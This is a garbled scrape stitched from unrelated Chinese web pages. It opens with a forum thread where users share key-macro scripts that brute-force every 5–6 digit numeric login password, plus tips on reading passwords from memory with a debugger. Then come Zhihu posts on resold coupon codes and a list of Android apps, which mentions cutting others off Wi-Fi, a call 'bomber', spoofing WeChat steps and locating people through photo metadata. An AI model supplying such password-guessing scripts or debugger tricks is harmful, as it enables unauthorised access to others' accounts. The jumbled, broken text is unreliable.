已知格式求按键精灵源代码水平暴力破解密码的源代码

百度知道百分悬赏。。。纯数字密码破解脚本【按键精灵吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:404,666贴子:
百度知道百分悬赏。。。纯数字密码破解脚本收藏
我这个有个办公系统软件 忘记登陆密码了,只记得是5位或6位纯数字,回车确定,无验证码。现在要暴力破解密码,要求是从00000开始,然后回车,然后输入00001,回车,直到999999,中途进入系统之后要知道密码是多少。。在下等,完成后+100分希望高人帮忙制作,链接是
新朗页游助手支持海量页游,页游辅助完美支持小号多开,微端多平台登陆.精品页游辅助工具,自动日常,自动副本,一键操作,玩页游更省时!
软件发过来我试试
定义一个六维数组a(9,9,9,9,9,9),h,i,j,k,l,m,n,...i=0,,,for 10.,,j=0,,for 10,,k=0,,for 10.,l=0,,for 10,,m=0,,for 10,,n=0,,for 10,,h=&&&i&j&k&l&m&n,,输入测试(六位),,if i=0,,h=&&&j&k&l&m&n., 输入测试(五位),,end if,,n=n+1,,next,,m=m+1,,next,,l=l+1,,next,,k=k+1,,next,,j=j+1.,next,,i=i+1,,next
FindPic 0, 0, , &Attachment:\找图.bmp&, 0.9, intX, intY
随便在登陆界面找个比较容易识别的不会改变的图片,然后用抓抓截图改名为找图放到附件就好了
If intX & 0 And intY & 0 Then
End IfLoopSub AA
If a & 10 Then
SayString &0000&
ElseIf a & 9 and a & 100 Then
SayString &000&
ElseIf a & 99 and a & 1000 Then
SayString &00&
ElseIf a & 999 and a & 10000 Then
SayString &0&
SayString a
KeyPress &Enter&, 1
//这里需要插入你的软件判断密码所需的时间,不然可能会导致跳过密码End Sub复制上面代码可达成
用OD跳一下
说说软件的名字
for 999999w=e+1e=e+1saystring wkeypress&enter&,1next
用OD把软件附上去。下一个弹窗口断点??内存写入断点??万能断点??////然后你随意输入一个错误的密码。,点进入软件。然后软件停下来。真正的密码是经过加密运算,存储在硬盘中的。PC会把真密码调进寄存器中,和假密码对比。这时候你用Ctrl+F9跟踪断点,就有可能在寄存器中,查到到真密码。找Call写Call吧_百度贴吧。
假密码一般通过加密后再对比。如12345,用()*2得到加密运算后的密码。Ctrl+F9多跳3下就找到了。////找到的真密码也要逆向运算,才会转换成5位的纯数字。这一切,就看你在OD方面的造诣了。
Dim a,b,c,d,eFor a = 0 to 9
For b = 0 To 9
For c = 0 To 9
For d = 0 to 9
For e = 0 To 9
SayString a & b & c & d & e
KeyPress &Enter&, 1
TracePrint a & b & c & d & e
IfColor 892,500,&A9C6D9&,0 then Goto 标记1 Else
Delay 1000 End If MoveTo 527, 484 Delay 1000 LeftClick 1Delay 1000 Rem 标记1MoveTo 535, 651 LeftClick 1
说了那么多只是为了一点点的经验
预备唱:#(滑稽) 宁静的夏天,楼主又在骗经验,脱掉裤子不要脸,还随地大小便,我可以假装看不见,也可以拍照作纪念,直到看到你那张猥琐的脸。
登录百度帐号你的位置:
穷举法破解6位数密码
14:08:28 |
来源: 按键精灵资源站
求大神帮我编个脚本,感谢!!! 如题...
思路是:用穷举法 每次都要确定验证.直至试遍所有密码.
密码可以脚本生成,也可以用字典.
本人小白,不懂编写...
再次感谢~~前提:因为工作换了新office,所以打算同城搬家 &br&&br&东西不是特别多而且怕搬家公司的工作人员打扰到合租的伙伴因此没有请专业的搬家公司,而是选择了货拉拉的小面包车。价格大概是搬家公司的一半我本来已经非常满足了。&br&&br&下单的时候因为是新用户跳出一张8元的新人抵扣券,旁边标着兑换码之类的标示。然后我灵感突然来了想着说淘宝上会不会有人卖优惠券的兑换码呢 &br&&br&果然执行力非常重要!如果我没有及时地去执行该想法根本发现不了!点开淘宝惊奇的发现满屏都是!!!选了一家最划算的妈呀一折券你说可不可怕!&br&&figure&&img data-rawheight=&1334& src=&https://pic4.zhimg.com/50/v2-0a842034bde7a258cfc60_b.jpg& data-rawwidth=&750& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic4.zhimg.com/50/v2-0a842034bde7a258cfc60_r.jpg&&&/figure&&br&&br&但我还是不放心一改我平时爽快无比的购物方式去咨询了卖家~&br&&br&&figure&&img data-rawheight=&1334& src=&https://pic2.zhimg.com/50/v2-77f56a684c9a6c9c69dba7f5cfc6681e_b.jpg& data-rawwidth=&750& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic2.zhimg.com/50/v2-77f56a684c9a6c9c69dba7f5cfc6681e_r.jpg&&&/figure&&br&&figure&&img data-rawwidth=&750& data-rawheight=&1334& src=&https://pic1.zhimg.com/50/v2-6e1e3dd7cc30feede8ae644b_b.jpg& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic1.zhimg.com/50/v2-6e1e3dd7cc30feede8ae644b_r.jpg&&&/figure&&br&&br&得到肯定答复后立马去货拉拉下单了~&br&此刻我还抱着不相信的想法 &br&直到进入付款界面的时候彻底惊的说不出话!!!&br&真的能打一折!&br&&br&&figure&&img data-rawheight=&1334& src=&https://pic1.zhimg.com/50/v2-fbde32dde0e172b87e7ecd_b.jpg& data-rawwidth=&750& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic1.zhimg.com/50/v2-fbde32dde0e172b87e7ecd_r.jpg&&&/figure&&br&&figure&&img data-rawheight=&1334& src=&https://pic3.zhimg.com/50/v2-05ceac43e523db_b.jpg& data-rawwidth=&750& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic3.zhimg.com/50/v2-05ceac43e523db_r.jpg&&&/figure&&br&最后我只花了9+30=39元的钱购买了原本90块的服务!简直可怕哈哈哈哈!&br&内心全是卧槽这特么也行果然是万能的淘宝!&br&于是我又屁颠屁颠跑过去夸卖家!&br&但是!&br&她竟然不理我!&br&生气!&figure&&img data-rawheight=&300& src=&https://pic3.zhimg.com/50/v2-3e6f7c7e7e16a27a2b28_b.jpg& data-rawwidth=&750& class=&origin_image zh-lightbox-thumb& width=&750& data-original=&https://pic3.zhimg.com/50/v2-3e6f7c7e7e16a27a2b28_r.jpg&&&/figure&&br&&br&于是我又就着这个思路&br&发现了酒店兑换券海底捞兑换券机场贵宾厅兑换券等等不能再神奇的省钱利器!&br&可怕可怕!&br&万能的淘宝果然社会
前提:因为工作换了新office,所以打算同城搬家 东西不是特别多而且怕搬家公司的工作人员打扰到合租的伙伴因此没有请专业的搬家公司,而是选择了货拉拉的小面包车。价格大概是搬家公司的一半我本来已经非常满足了。 下单的时候因为是新用户跳出一张8元的新…
&p&5月13日更新:&/p&&ol&&li&新增 &b&RE文件管理器、全面屏手势、Syslock、Sky Mi、FastMiui、八戒助手&唐僧藏经&/b&&/li&&li&如何强制开启小米手机的全面屏手势(对于非全面屏手机)?推荐 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&&span class=&invisible&&https://www.&/span&&span class=&visible&&zhihu.com/question/2751&/span&&span class=&invisible&&44118/answer/&/span&&span class=&ellipsis&&&/span&&/a& 的回答&/li&&/ol&&hr&&p&4月1日更新:&/p&&ol&&li&所有的 app 均可在 &a href=&//link.zhihu.com/?target=https%3A//resources.radiastu.com//awsome-android-apps/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&资源站&/a& 点击 app 名称&b&直接下载&/b&,不用再被百度网盘坑了 :)&/li&&li&新增12个 app,更新于:&/li&&/ol&&a href=&//link.zhihu.com/?target=https%3A//resources.radiastu.com//awsome-android-apps/& data-draft-node=&block& data-draft-type=&link-card& data-image=&https://pic4.zhimg.com/v2-0dd700c7000f4cda231dcffe34c37d4f_180x120.jpg& data-image-width=&351& data-image-height=&278& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&逆天的安卓app分享 · 资源站&/a&&ol&&li&推一下 &a class=&member_mention& href=&//www.zhihu.com/people/608b197ef9a0efecbaf6b1af17247d66& data-hash=&608b197ef9a0efecbaf6b1af17247d66& data-hovercard=&p$b$608b197ef9a0efecbaf6b1af17247d66&&@酷安网&/a&的回答:&/li&&/ol&&p&&a href=&https://www.zhihu.com/question//answer/?utm_source=wechat_session&utm_medium=social& class=&internal&&Android 是否有一些冷门但却逆天的 APP 呢?&/a&&/p&&p&提到了一种虚拟 Xposed,可以无需 root ,不用刷入 xp 而使用 Xposed 模块。&/p&&p&对于无法刷 xp 的设备简直就是福音。&/p&&p&(注:今天的更新与愚人节无关)&/p&&hr&&p&2月24日更新:&/p&&p&更新下载链接:
&a href=&//link.zhihu.com/?target=https%3A//pan.baidu.com/s/1nwFKpT3& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&pan.baidu.com/s/1nwFKpT&/span&&span class=&invisible&&3&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&解压密码: &b&app&/b&&/p&&p&所有 App 介绍请见:&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//resources.radiastu.com//awsome-android-apps/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&逆天的安卓app分享 · 资源站&/a&&/p&&p&可能包含某些敏感词,试了几个网盘,一旦分享,瞬间失效。&/p&&p&不得已,只能整个文件夹压缩并设置了密码。&/p&&p&&b&整理的过程挺辛苦的,如果我的回答对你有帮助,不妨留一个赞?&/b&&/p&&hr&&p&&br&&/p&&p&2月9日更新:&/p&&p&精简了文章,放置于我的资源站&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//resources.radiastu.com//awsome-android-apps/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&逆天的安卓app分享 · 资源站&/a&&/p&&p&少了很多不必要的文字,更精准的分类,极简的版面。&/p&&p&以后就直接更新在那儿了&/p&&hr&&p&&br&&/p&&p&1月25日更新:&/p&&p&百度网盘和谐太快,无奈先用 GitHub 应急一下~&/p&&p&App 下载地址:&a href=&//link.zhihu.com/?target=https%3A//github.com/linyuxuanlin/Awsome-Android-apps& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Awsome-Android-apps&/a&&/p&&p&手机打开网页,点击 view code 就可以查看了。&/p&&p&-----&/p&&p&1月23日更新:&br&&/p&&p&好多小伙伴说分享链接失效了,毕竟有些app并不是太和谐。。。周末重新更新一下吧。&/p&&p&另:大家有比较稳定的分享工具/平台推荐一下吗?&/p&&p&-----&/p&&p&日更新:&br&&/p&&h2&1.白描&/h2&&p&作为一款 OCR 文字识别应用,当你想获取照片中的文字,而又不想手动打字的时候,这个 app 绝对是你的必需。&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-6bdb3bafceca65a2c72f1d7_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1626& data-rawheight=&2664& class=&origin_image zh-lightbox-thumb& width=&1626& data-original=&https://pic4.zhimg.com/50/v2-6bdb3bafceca65a2c72f1d7_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/50/v2-efe60d32d1cae764de81b6_b.jpg& data-size=&normal& data-rawwidth=&1626& data-rawheight=&2890& class=&origin_image zh-lightbox-thumb& width=&1626& data-original=&https://pic1.zhimg.com/50/v2-efe60d32d1cae764de81b6_r.jpg&&&figcaption&识别后可以直接翻译&/figcaption&&/figure&&p&&br&&/p&&p&&b&下载地址&/b&:链接:&a href=&//link.zhihu.com/?target=http%3A//pan.baidu.com/s/1gfzjHtD& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&百度网盘&/a&
密码:4uvk&/p&&p&ps:为了大家能下载到最新的 app,以后就直接放酷安的下载地址得了:)&/p&&p&------&/p&&p&&br&&/p&&p&11月17日更新:&br&&/p&&p&关于下面的微X模块,安装后在桌面是看不到图标的,需要在xposed安装器或微信内才能看到。&/p&&p&关于xposed,推荐本问题下的两个很详细的回答: &/p&&p&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&&span class=&invisible&&https://www.&/span&&span class=&visible&&zhihu.com/question/5570&/span&&span class=&invisible&&1954/answer/&/span&&span class=&ellipsis&&&/span&&/a&&br&&/p&&p&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&&span class=&invisible&&https://www.&/span&&span class=&visible&&zhihu.com/question/5570&/span&&span class=&invisible&&1954/answer/&/span&&span class=&ellipsis&&&/span&&/a&&/p&&p&------&br&&/p&&p&10月28日更新:&/p&&h2&1.(xposed)微X模块&/h2&&p&这是一个超级强大的app。有了它,你的微信基本上无敌了。&/p&&p&功能非常多,自己在用的主要有这几个:&/p&&ul&&li&一键转发各种内容到朋友圈&/li&&li&群聊管理&/li&&li&自动回复&/li&&li&删僵尸粉&/li&&li&朋友圈伪集赞(千万不要点“全选好友”,会卡机的)&/li&&li&自动抢红包&/li&&li&&b&朋友圈防撤回&/b&,&b&评论防删除&/b&&/li&&li&消息防撤回&/li&&li&快速切换账号&/li&&/ul&&p&&i&截图为部分功能界面:&/i&&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-b35ffdc7da2c31c4c8a11e_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1280& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic1.zhimg.com/50/v2-b35ffdc7da2c31c4c8a11e_r.jpg&&&/figure&&p&感谢&a class=&member_mention& href=&//www.zhihu.com/people/ee6ad5edd7& data-hash=&ee6ad5edd7& data-hovercard=&p$b$ee6ad5edd7&&@Kryo&/a& 提供的&b&防撤回&/b&截图:&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-dffcdc16f4bebaf6437fbb_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&600& data-rawheight=&349& class=&origin_image zh-lightbox-thumb& width=&600& data-original=&https://pic1.zhimg.com/50/v2-dffcdc16f4bebaf6437fbb_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/50/v2-5f49aacab953ddc339a36_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&576& data-rawheight=&509& class=&origin_image zh-lightbox-thumb& width=&576& data-original=&https://pic2.zhimg.com/50/v2-5f49aacab953ddc339a36_r.jpg&&&/figure&&p&&br&&/p&&p&------&/p&&p&10月14日更新:&br&&/p&&p&部分知友反映某些App被杀毒软件检测到有病毒。我觉得,毕竟我分享的App有一些是用于破解的,所以。。。挺正常的。亲测没有问题,只不过自己也留个心眼,如果不希望有太大风险的话还是去正规的应用商店下载吧。。。&/p&&p&------&br&&/p&&p&&i&9月24日更新:&/i&&/p&&h2&1.图片信息&/h2&&p&这个app能把一张原始的图片分解出很多信息,如图:&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-247f7ceb47d_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&720& data-rawheight=&1280& class=&origin_image zh-lightbox-thumb& width=&720& data-original=&https://pic4.zhimg.com/50/v2-247f7ceb47d_r.jpg&&&/figure&&p&最重要的是地理位置信息,可以用来定位某个人 : )&/p&&p&&br&&/p&&p&所以,照片千万不要发原图,会暴露很多个人信息的。&/p&&blockquote&可以,这很社工。&/blockquote&&p&&br&&/p&&hr&&p&&br&&/p&&p&&i&9月3日更新:&/i&&/p&&h2&1.(xposed)微精灵&/h2&&figure&&img src=&https://pic3.zhimg.com/50/v2-e79b913c468f611dc636ebc_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic3.zhimg.com/50/v2-e79b913c468f611dc636ebc_r.jpg&&&/figure&&p&给微信上各种辅助功能,不过需要xposed&/p&&p&&br&&/p&&p&&br&&/p&&h2&2.阿里通电话&/h2&&figure&&img src=&https://pic2.zhimg.com/50/v2-0b0d354e01cd7c97f6101_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic2.zhimg.com/50/v2-0b0d354e01cd7c97f6101_r.jpg&&&/figure&&p&一个网络电话,可以变声。初始有10块钱话费。&/p&&p&如果自己写个脚本,还能造出一个轰炸机(嘿嘿嘿)&/p&&p&&br&&/p&&p&&br&&/p&&h2&3.TouchRetouch&/h2&&figure&&img src=&https://pic3.zhimg.com/50/v2-73ccbeae5bcedb0b460f2e4_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&506& data-rawheight=&900& class=&origin_image zh-lightbox-thumb& width=&506& data-original=&https://pic3.zhimg.com/50/v2-73ccbeae5bcedb0b460f2e4_r.jpg&&&/figure&&p&能去除你不想出现在照片中的杂物,比snapspeed的&b&修复&/b&功能似乎强了一点。&/p&&p&另:期望MIUI9也能集成这样的功能 :)&/p&&p&&br&&/p&&h2&4.掌上看家&/h2&&p&图我就不放了,免费版的广告挺多。。。&/p&&p&总之就是能让你的闲置手机成为一个网络摄像头,放在家里监控&/p&&p&&br&&/p&&p&&br&&/p&&p&------&/p&&p&&i&8月29日更新:&/i&&/p&&h2&1.&b&&u&&a href=&//link.zhihu.com/?target=https%3A//github.com/iweizime/WechatStepChanger& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&WechatStepChanger&/a&&/u&&/b&&/h2&&p&感谢评论区 &a class=&member_mention& href=&//www.zhihu.com/people/02b0f9d7d36a84c2d960b& data-hash=&02b0f9d7d36a84c2d960b& data-hovercard=&p$b$02b0f9d7d36a84c2d960b&&@苇子&/a& 的作品!抱歉忘了添加进回答~&/p&&p&超好用的一个微信步数修改的app,不需要xposed,只需要root权限,通过修改微信的文件直接修改步数,比我之前推荐的那个好用得太多了。&/p&&figure&&img src=&https://pic3.zhimg.com/50/v2-52498cfae860abf29465ae_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic3.zhimg.com/50/v2-52498cfae860abf29465ae_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/50/v2-effb6e113ef_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1133& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-effb6e113ef_r.jpg&&&/figure&&p&不过,不要一次刷太多步数,也千万不要捐步,会被封号的~&/p&&p&感谢此app作者的推荐!如果你有好用的app,可以在评论区留言,我会整理后分享给大家。&/p&&p&&br&&/p&&p&&i&------&/i&&/p&&p&&i&8月28日更新:&/i&&/p&&h2&1.小圆角&/h2&&p&又一个来自酷安的app。&/p&&figure&&img src=&https://pic3.zhimg.com/50/v2-ac6fe8b9dfb6d9fb1ded_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic3.zhimg.com/50/v2-ac6fe8b9dfb6d9fb1ded_r.jpg&&&/figure&&p&如图,虽然现在看图片边角是黑色的,但是放到手机上,就和边框融合到一起了~&/p&&p&(有白色正面屏幕的手机是硬伤。。。)&/p&&p&很微小的细节,让屏幕像薄卡片一样,很material design化,个人超喜欢。&/p&&p&&i&------&/i&&/p&&p&&i&8月19日更新:&/i&&/p&&h2&1.一个木函&/h2&&figure&&img src=&https://pic4.zhimg.com/50/v2-bdd0882fdee1d1b0a4ffff04fe8d04ce_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&3288& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-bdd0882fdee1d1b0a4ffff04fe8d04ce_r.jpg&&&/figure&&p&↑如图↑ 各种想不到的功能。好多人向我要下载地址,不过,随着时间的推移,app可能会更新。如果想下载最新版本的,请到&b&酷安&/b&下载。懒?我的百度云分享里也能找到,应用内更新也是可以的。&/p&&p&&br&&/p&&p&&br&&/p&&h2&2.网盘搜索神器&/h2&&figure&&img src=&https://pic2.zhimg.com/50/v2-ada3908448a_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1570& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic2.zhimg.com/50/v2-ada3908448a_r.jpg&&&/figure&&p&总之,能搜索到各种&b&意想不到&/b&的~&/p&&p&&br&&/p&&p&&br&&/p&&h2&3.微信自动回复&/h2&&figure&&img src=&https://pic2.zhimg.com/50/v2-27f23bc4b6852fbf0dd4a8d352b366a0_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic2.zhimg.com/50/v2-27f23bc4b6852fbf0dd4a8d352b366a0_r.jpg&&&/figure&&p&自动回复,不需要root权限。不过,过一段时间需要重新扫二维码。&/p&&p&能root和xposed的童鞋还是去找更高级的吧&/p&&p&&br&&/p&&p&&br&&/p&&h2&4.米隐&/h2&&figure&&img src=&https://pic1.zhimg.com/50/v2-65ad3f6cb09af_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-65ad3f6cb09af_r.jpg&&&/figure&&p&对于MIUI系统,这个app简直是太有用了!&/p&&p&平常在设置里都找不到的功能,在这个app里能直接调出。&/p&&p&&br&&/p&&p&&br&&/p&&p&5.谷歌插件&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-8d5c473f18_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1339& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-8d5c473f18_r.jpg&&&/figure&&p&直接调出google的设置,和上面那个app差不多~&/p&&p&&br&&/p&&p&其他更新,见下文&b&xposed&/b&分组&/p&&ul&&li&xposed安装器(重要!玩xposed必需!)&/li&&li&机器人9号&/li&&/ul&&p&&i&------&/i&&/p&&p&&i&8月12日更新:&/i&&/p&&p&预更新:&/p&&ul&&li&tasker&/li&&/ul&&p&&i&注:本回答的大多数app来自酷安、Google Play、万宝乐和一些app分享群,我只是推荐一些自己觉得逆天的app,然后介绍一下而已。。。酷安大佬们请轻点喷。。。&/i&&/p&&p&&i&关于&b&妮媌&/b&这个app在文末有更新&/i&&/p&&p&&i&------&/i&&/p&&p&&i&8月12日更新:&/i&&/p&&h2&1.Auto.js&/h2&&figure&&img src=&https://pic1.zhimg.com/50/v2-b0e0a41c46c16c018e4ea04_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-b0e0a41c46c16c018e4ea04_r.jpg&&&/figure&&p&有点像&i&按键精灵,&/i&能代替手指执行一些重复而无聊的操作。&/p&&p&可以用app提供的操作模块,也可以自己写一段脚本。&/p&&p&&br&&/p&&p&&br&&/p&&h2&&b&2.万宝乐&/b&&/h2&&p&可以发现很多 &i&不可描述 &/i&的app&/p&&p&不放图,自己去体验一下吧~&/p&&p&&br&&/p&&p&&br&&/p&&blockquote&关于『(参考)&b&下载地址&/b&』:&br&因为我分享的app总是会更新的,我提供的只是文章截稿时最新的版本。&/blockquote&&p&8k赞的时候,奉上更多逆天的app~&/p&&p&&i&------&/i&&/p&&p&&i&更新于8月2日:&/i&&/p&&p&作为一个拥有300+个app的重度患者,我分享几个逆天的app:&/p&&p&&br&&/p&&h2&1.防蹭网大师&/h2&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-c12c6d1785ccfaf6d0f27a1f5f7c6868_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1237& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-c12c6d1785ccfaf6d0f27a1f5f7c6868_r.jpg&&&/figure&&p&&b&逆天的功能:&/b&&/p&&p&&b&不用管理员密码,阻止其他设备上网&/b&(需要root权限)&/p&&p&阻止之后,其他设备表面上依然能连网,不过是&b&没有流量传输的。&/b&&/p&&blockquote&&b&“让你抢我网速?不存在的!”&/b&&/blockquote&&p&&br&&/p&&h2&2.UZER&/h2&&figure&&img src=&https://pic3.zhimg.com/50/v2-244ea1f2d06eed66b3578_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1920& data-rawheight=&1080& class=&origin_image zh-lightbox-thumb& width=&1920& data-original=&https://pic3.zhimg.com/50/v2-244ea1f2d06eed66b3578_r.jpg&&&/figure&&p&&b&逆天的功能:&/b&&/p&&p&&b&用手机直接操作Word、PS、AI、PPT之类的大型电脑工具&/b&&/p&&p&(前提是手机能上网)&/p&&p&原理:直接操作网页端编辑,但效果非常棒!手机可以通过OTG/蓝牙连接鼠标键盘&/p&&p&我把这个app放在手机里,以备不时之需&/p&&blockquote&“哇你的手机能用Adobe AI ?”&/blockquote&&p&&br&&/p&&h2&3.Easy File Converter&/h2&&figure&&img src=&https://pic3.zhimg.com/50/v2-5f0c31de5e7d8e420b78_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&3360& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic3.zhimg.com/50/v2-5f0c31de5e7d8e420b78_r.jpg&&&/figure&&p&手机里的文件转换器&/p&&p&&b&逆天的功能:&/b&&/p&&p&&b&支持多种格式转换。&/b&&/p&&p&有时候,我们在手机里想转换一个文件的格式,总是得先传到电脑进行转换。用这个app直接解决了问题,省去了麻烦。&/p&&blockquote&“文件打不开?我用这个app转一下格式”&/blockquote&&p&&br&&/p&&p&&br&&/p&&h2&4.Village (原山寨云)&/h2&&p&度盘下载限速?试试这个app&/p&&p&&br&&/p&&figure&&img src=&https://pic4.zhimg.com/50/v2-fa37b5d2ff5ab472fadbeafe_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-fa37b5d2ff5ab472fadbeafe_r.jpg&&&/figure&&p&&b&逆天的功能:&/b&&/p&&p&&b&直接生成直链,导出下载(迅雷或其他下载器)&/b&&/p&&blockquote&“管它的限速呢”&/blockquote&&p&&br&&/p&&h2&6.超级视频&/h2&&p&&b&逆天的功能:&/b&&/p&&p&&b&能找到很多最新的电影&/b&&/p&&blockquote&“同学你的电影在哪找的?优酷怎么找不到?”&/blockquote&&p&&br&&/p&&h2&7.GGuardian&/h2&&p&一个游戏修改器,我试过八门神器、烧饼修改器、葫芦侠等等,只有这个在我手机上能用(我是小米6,不知道其他如何)&/p&&p&&br&&/p&&figure&&img src=&https://pic1.zhimg.com/50/v2-ace541d26e6394ccb5eec4c1af620808_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-ace541d26e6394ccb5eec4c1af620808_r.jpg&&&/figure&&blockquote&“你的9999999金币哪来的?”&/blockquote&&p&&br&&/p&&p&&br&&/p&&h2&8.多核观测器&/h2&&figure&&img src=&https://pic4.zhimg.com/50/v2-45ab2bb307e864dcb458edc6b74c0770_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-45ab2bb307e864dcb458edc6b74c0770_r.jpg&&&/figure&&p&嗯。。。一个可以看到内核运行情况的app&/p&&p&&b&逆天的功能:&/b&&/p&&p&&b&悬浮窗,实时监测,可以拿来装逼&/b&&/p&&blockquote&“手机还可以这样玩?”&/blockquote&&p&&br&&/p&&p&&br&&/p&&h2&9.共享单车优惠码&/h2&&figure&&img src=&https://pic1.zhimg.com/50/v2-ae2ace2cc8b6c164dbd5c_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-ae2ace2cc8b6c164dbd5c_r.jpg&&&/figure&&p&&b&逆天的功能:&/b&&/p&&p&&b&直接获取小黄车、摩拜的优惠码&/b&&/p&&blockquote&“你怎么骑共享总是免费的呢?”&/blockquote&&p&&br&&/p&&h2&10.远离手机&/h2&&figure&&img src=&https://pic1.zhimg.com/50/v2-ce1da7c1c269f75d15c8fbc_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic1.zhimg.com/50/v2-ce1da7c1c269f75d15c8fbc_r.jpg&&&/figure&&p&&b&逆天的功能:&/b&&/p&&p&&b&一旦按下按钮,除了关机以外,你真的没法解锁手机。好好读一本书吧。&/b&&/p&&p&&br&&/p&&p&&br&&/p&&h2&11.微号自动加群友&/h2&&figure&&img src=&https://pic4.zhimg.com/50/v2-767c5d526f54d193f09a4_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& data-original=&https://pic4.zhimg.com/50/v2-767c5d526f54d193f09a4_r.jpg&&&/figure&&p&&b&逆天的功能:&/b&&/p&&p&&b&打开微信群,自动加群里的好友&/b&&/p&&blockquote&“微信好友就快满5000了。。。”&/blockquote&&p&&br&&/p&&p&&br&&/p&&p&&br&&/p&&p&———分割线———&/p&&p&xposed专用(手机root后安装&b&xposed安装器&/b&,在&b&xposed安装器&/b&中勾选某个&b&想要启用的app&/b&,然后重启手机,就能用了)&/p&&p&&b&注意:没有经验不要乱玩xposed,容易变砖&/b&&/p&&p&&br&&/p&&h2&&b&0.xposed安装器&/b&&/h2&&figure&&img src=&https://pic4.zhimg.com/50/v2-da64ffb5aae4_b.jpg& data-caption=&& data-size=&normal& data-rawwidth=&1080& data-rawheight=&1920& class=&origin_image zh-lightbox-thumb& width=&1080& 